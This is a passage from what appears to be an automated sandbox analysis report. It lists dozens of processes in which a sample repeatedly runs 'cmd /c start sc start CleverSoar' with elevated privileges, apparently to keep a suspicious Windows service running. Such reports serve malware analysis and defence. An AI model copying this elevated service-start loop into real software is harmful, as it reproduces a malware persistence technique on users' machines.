                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:13
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:14
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:15
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:20
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:28
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:31
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:39
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:40
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:41
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:42
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:43
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:44
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:45
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:46
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:47
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:48
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:49
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:50
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:51
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:52
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:53
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:54
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:55
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:56
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:57
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:58
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:59
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:60
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:61
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:62
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:63
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:64
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:65
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:66
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:67
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:68
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:69
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:70
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:71
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:72
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:73
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:74
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:75
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:76
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:77
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:78
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
